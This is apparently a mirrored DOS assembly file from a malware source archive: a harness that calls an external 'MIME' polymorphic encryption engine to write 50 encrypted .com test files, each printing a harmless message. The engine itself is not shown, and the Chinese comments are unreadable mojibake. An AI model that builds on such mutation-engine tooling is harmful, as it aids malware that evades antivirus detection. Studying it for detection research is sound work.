mirror of
https://github.com/vxunderground/MalwareSourceCode.git
synced 2024-12-21 10:56:10 +00:00
86 lines
2.3 KiB
NASM
86 lines
2.3 KiB
NASM
|
.286
|
|||
|
.model small
|
|||
|
.code
|
|||
|
org 0100h
|
|||
|
|
|||
|
msg_addr equ offset msg - offset proc_start- 3
|
|||
|
|
|||
|
extrn mime:near,emime:near
|
|||
|
|
|||
|
; <20>H<EFBFBD>U<EFBFBD>{<7B><><EFBFBD>A<EFBFBD><41><EFBFBD>F<EFBFBD>n<EFBFBD>`<60>N<EFBFBD><4E><EFBFBD>a<EFBFBD>観<EFBFBD>`<60>ѡA<D1A1>䥦<EFBFBD><E4A5A6><EFBFBD><EFBFBD><EFBFBD>ۤv<DBA4><76><EFBFBD>s
|
|||
|
|
|||
|
start:
|
|||
|
mov ah,09h
|
|||
|
mov dx,offset dg_msg
|
|||
|
int 21h
|
|||
|
|
|||
|
mov ax,offset emime+000fh ; <20><><EFBFBD>{<7B><> + mime+000fh <20><><EFBFBD>᪺<EFBFBD><E1AABA><EFBFBD>}
|
|||
|
; <20>Y<EFBFBD><59> 0100h <20>h<EFBFBD><68><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>{<7B><> + mime <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD>
|
|||
|
|
|||
|
shr ax,4
|
|||
|
mov bx,cs
|
|||
|
add bx,ax
|
|||
|
|
|||
|
mov es,bx ; <20>] es <20>Ψө<CEA8><D3A9>ѽX<D1BD>{<7B><><EFBFBD>M<EFBFBD>Q<EFBFBD>s<EFBFBD>X<EFBFBD><58><EFBFBD><EFBFBD>
|
|||
|
; <20>ѽX<D1BD>{<7B><><EFBFBD>̤j<CCA4><6A> 1024 bytes
|
|||
|
; <20>Y<EFBFBD>Φb<CEA6>`<60>n<EFBFBD>{<7B><><EFBFBD>ɡA<C9A1>h<EFBFBD><68><EFBFBD>`<60>N<EFBFBD><4E><EFBFBD>t<EFBFBD><74><EFBFBD>O<EFBFBD><4F><EFBFBD><EFBFBD><EFBFBD>j<EFBFBD>p
|
|||
|
|
|||
|
mov cx,50
|
|||
|
dg_l0:
|
|||
|
push cx
|
|||
|
mov ah,3ch
|
|||
|
xor cx,cx
|
|||
|
mov dx,offset file_name
|
|||
|
int 21h
|
|||
|
xchg bx,ax
|
|||
|
|
|||
|
mov cx,offset proc_end-offset proc_start ; <20>Q<EFBFBD>s<EFBFBD>X<EFBFBD>{<7B><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>
|
|||
|
|
|||
|
mov si,offset proc_start ; ds:si -> <20>n<EFBFBD>Q<EFBFBD>s<EFBFBD>X<EFBFBD><58><EFBFBD>{<7B><><EFBFBD><EFBFBD><EFBFBD>}
|
|||
|
xor di, di
|
|||
|
|
|||
|
push bx ; <20>O<EFBFBD>s file handle
|
|||
|
|
|||
|
mov bx, 100h ; com <20>Ҧ<EFBFBD>
|
|||
|
|
|||
|
call mime
|
|||
|
|
|||
|
pop bx
|
|||
|
|
|||
|
mov ah,40h ; <20><><EFBFBD>^<5E><> ds:dx = <20>ѽX<D1BD>{<7B><> + <20>Q<EFBFBD>s<EFBFBD>X<EFBFBD>{<7B><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>}
|
|||
|
int 21h ; cx = <20>ѽX<D1BD>{<7B><> + <20>Q<EFBFBD>s<EFBFBD>X<EFBFBD>{<7B><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>סA<D7A1>䥦<EFBFBD>Ȧs<C8A6><73><EFBFBD><EFBFBD><EFBFBD><EFBFBD>
|
|||
|
|
|||
|
mov ah,3eh
|
|||
|
int 21h
|
|||
|
|
|||
|
push cs
|
|||
|
pop ds ; <20>N ds <20>]<5D>^<5E><>
|
|||
|
|
|||
|
mov bx,offset file_num
|
|||
|
inc byte ptr ds:[bx+0001h]
|
|||
|
cmp byte ptr ds:[bx+0001h],'9'
|
|||
|
jbe dg_l1
|
|||
|
inc byte ptr ds:[bx]
|
|||
|
mov byte ptr ds:[bx+0001h],'0'
|
|||
|
dg_l1:
|
|||
|
pop cx
|
|||
|
loop dg_l0
|
|||
|
mov ah,4ch
|
|||
|
int 21h
|
|||
|
|
|||
|
file_name db '000000'
|
|||
|
file_num db '00.com',00h
|
|||
|
|
|||
|
dg_msg db 'generates 50 mime encrypted test files.',0dh,0ah,'$'
|
|||
|
|
|||
|
proc_start:
|
|||
|
call $+0003h
|
|||
|
pop dx
|
|||
|
add dx,msg_addr
|
|||
|
mov ah,09h
|
|||
|
int 21h
|
|||
|
int 20h
|
|||
|
msg db 'This is <MIME> test file.$'
|
|||
|
proc_end:
|
|||
|
end start
|